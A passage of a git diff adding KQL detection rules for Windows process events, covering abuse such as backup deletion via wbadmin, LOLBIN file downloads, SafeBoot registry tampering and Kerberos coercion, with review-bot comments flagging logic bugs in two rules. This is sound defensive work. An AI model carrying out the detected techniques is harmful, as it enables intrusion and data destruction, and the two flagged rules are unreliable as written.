attack.t1059 +// False Positives: +// - False positive are expected with legitimate sources + +DeviceProcessEvents +| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql new file mode 100644 index 00000000..aab102c7 --- /dev/null +++ b/KQL/rules/windows/process_creation/add_potential_suspicious_new_download_source_to_winget.kql @@ -0,0 +1,10 @@ +// Title: Add Potential Suspicious New Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: medium +// Description: Detects usage of winget to add new potentially suspicious download sources +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql b/KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql new file mode 100644 index 00000000..dcc7fd44 --- /dev/null +++ b/KQL/rules/windows/process_creation/add_safeboot_keys_via_reg_utility.kql 
@@ -0,0 +1,12 @@ +// Title: Add SafeBoot Keys Via Reg Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql b/KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql new file mode 100644 index 00000000..282b4570 --- /dev/null +++ b/KQL/rules/windows/process_creation/add_windows_capability_via_powershell_cmdlet.kql @@ -0,0 +1,12 @@ +// Title: Add Windows Capability Via PowerShell Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: medium +// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. + +DeviceProcessEvents +| where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql b/KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql new file mode 100644 index 00000000..53dbd2bb --- /dev/null +++ b/KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql @@ -0,0 +1,10 @@ +// Title: AddinUtil.EXE Execution From Uncommon Directory +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: medium +// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql b/KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql new file mode 100644 index 00000000..1c055f70 --- /dev/null +++ b/KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql 
@@ -0,0 +1,12 @@ +// Title: AgentExecutor PowerShell Execution +// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards +// Date: 2022-12-24 +// Level: medium +// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not(InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql new file mode 100644 index 00000000..2390cd58 --- /dev/null +++ b/KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql 
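Review bot: `FolderPath =~ "\\AgentExecutor.exe"` tests the full image path for equality with a path fragment, which can never be true, so the rule only fires when ProcessVersionInfoOriginalFileName is populated with "AgentExecutor.exe" and a copy with stripped or altered version info escapes detection. Every sibling rule in this change expresses the same intent as a suffix match, e.g. `FolderPath endswith "\\AgentExecutor.exe"`. As with the other generated files, the mapping likely needs correcting in the converter so the regenerated output keeps the fix.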
@@ -0,0 +1,12 @@ +// Title: All Backups Deleted Via Wbadmin.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-13 +// Level: high +// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe". +// This technique is used by numerous ransomware families and actors. +// This may only be successful on server platforms that have Windows Backup enabled. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceProcessEvents +| where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql new file mode 100644 index 00000000..ee4e890d --- /dev/null +++ b/KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: high +// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents +| where ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")) and (not(InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql b/KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql new file mode 100644 index 00000000..3689f997 --- /dev/null +++ b/KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql 
@@ -0,0 +1,10 @@ +// Title: Always Install Elevated MSI Spawned Cmd And Powershell +// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql b/KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql new file mode 100644 index 00000000..8501908f --- /dev/null +++ b/KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql 
@@ -0,0 +1,14 @@ +// Title: Always Install Elevated Windows Installer +// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 +// False Positives: +// - System administrator usage +// - Anti virus products +// - WindowsApps located in "C:\Program Files\WindowsApps\" + +DeviceProcessEvents +| where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")))) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql b/KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql new file mode 100644 index 00000000..c7b87fa2 --- /dev/null +++ b/KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Application Removed Via Wmic.EXE +// Author: frack113 +// Date: 2022-01-28 +// Level: medium +// Description: Detects the removal or uninstallation of an application via "Wmic.EXE". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql b/KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql new file mode 100644 index 00000000..331de52b --- /dev/null +++ b/KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Application Terminated Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-11 +// Level: medium +// Description: Detects calls to the "terminate" function via wmic in order to kill an application +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql b/KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql new file mode 100644 index 00000000..a81e8577 --- /dev/null +++ b/KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql 
@@ -0,0 +1,12 @@ +// Title: Arbitrary Binary Execution Using GUP Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-10 +// Level: medium +// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Other parent binaries using GUP not currently identified + +DeviceProcessEvents +| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql b/KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql new file mode 100644 index 00000000..e5e3794a --- /dev/null +++ b/KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql 
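Review bot: `isnull(ProcessCommandLine)` in the filter never matches, because Kusto's string type has no null value and `isnull` on a string column is always false, so the intended "command line absent" exclusion is dead and the rule will alert on explorer.exe launched by gup.exe with an empty command line. The conventional check for a missing string value is `isempty(ProcessCommandLine)`, which covers both empty and absent. The same null-to-`isnull` mapping may affect other converted rules that use a null field in their filter; only this hunk shows it in the visible change.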
@@ -0,0 +1,12 @@
+// Title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrator usage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")) and (not(((ProcessCommandLine contains "C:\\ProgramData\\CSScriptNpp\\" and ProcessCommandLine contains "-cscs_path:" and ProcessCommandLine contains "\\cs-script\\cscs.dll") and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Notepad++\\notepad++.exe", "C:\\Program Files\\Notepad++\\notepad++.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql
new file mode 100644
index 00000000..841d0dc5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql
@@ -0,0 +1,12 @@
+// Title: Arbitrary File Download Via ConfigSecurityPolicy.EXE
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
+// Users can configure different pilot collections for each of the co-management workloads.
+// It can be abused by attackers in order to upload or download files.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
new file mode 100644
index 00000000..d724539f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via GfxDownloadWrapper.EXE
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and FolderPath endswith "\\GfxDownloadWrapper.exe") and (not(ProcessCommandLine contains "https://gameplayapi.intel.com/"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql
new file mode 100644
index 00000000..9f47fb3a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via IMEWDBLD.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: high
+// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql
new file mode 100644
index 00000000..24155d2f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSEDGE_PROXY.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: medium
+// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql
new file mode 100644
index 00000000..52743a07
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSOHTMED.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "MSOHTMED" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql
new file mode 100644
index 00000000..02fb0133
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSPUB.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql
new file mode 100644
index 00000000..6c3ffac9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via PresentationHost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql
new file mode 100644
index 00000000..a9df2741
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql
@@ -0,0 +1,12 @@
+// Title: Arbitrary File Download Via Squirrel.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql b/KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql
new file mode 100644
index 00000000..2343874d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary MSI Download Via Devinit.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql b/KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql
new file mode 100644
index 00000000..785b6fc6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary Shell Command Execution Via Settingcontent-Ms
+// Author: Sreeman
+// Date: 2020-03-13
+// Level: medium
+// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
+// MITRE Tactic: Execution
+// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial-access
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/aspnetcompiler_execution.kql b/KQL/rules/windows/process_creation/aspnetcompiler_execution.kql
new file mode 100644
index 00000000..ac55367d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/aspnetcompiler_execution.kql
@@ -0,0 +1,10 @@
+// Title: AspNetCompiler Execution
+// Author: frack113
+// Date: 2021-11-24
+// Level: medium
+// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql b/KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql
new file mode 100644
index 00000000..981daf77
--- /dev/null
+++ b/KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Assembly Loading Via CL_LoadAssembly.ps1
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
new file mode 100644
index 00000000..8d1920bf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
@@ -0,0 +1,16 @@
+// Title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-20
+// Level: high
+// Description: Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
+// The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
+// Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
+// It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
+// to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
+// If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
+// or checking for the presence of such records through the `nslookup` command.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.persistence, attack.privilege-escalation, attack.t1557.001, attack.t1187
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "UWhRCA" and ProcessCommandLine contains "BAAAA"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/audio_capture_via_powershell.kql b/KQL/rules/windows/process_creation/audio_capture_via_powershell.kql
new file mode 100644
index 00000000..86e5aa7d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/audio_capture_via_powershell.kql
@@ -0,0 +1,12 @@
+// Title: Audio Capture via PowerShell
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects audio capture via PowerShell Cmdlet.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+// False Positives:
+// - Legitimate audio capture by legitimate user.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql b/KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql
new file mode 100644
index 00000000..c8a4540e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql
@@ -0,0 +1,12 @@
+// Title: Audio Capture via SoundRecorder
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detect attacker collecting audio via SoundRecorder application.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+// False Positives:
+// - Legitimate audio capture by legitimate user.
+
+DeviceProcessEvents
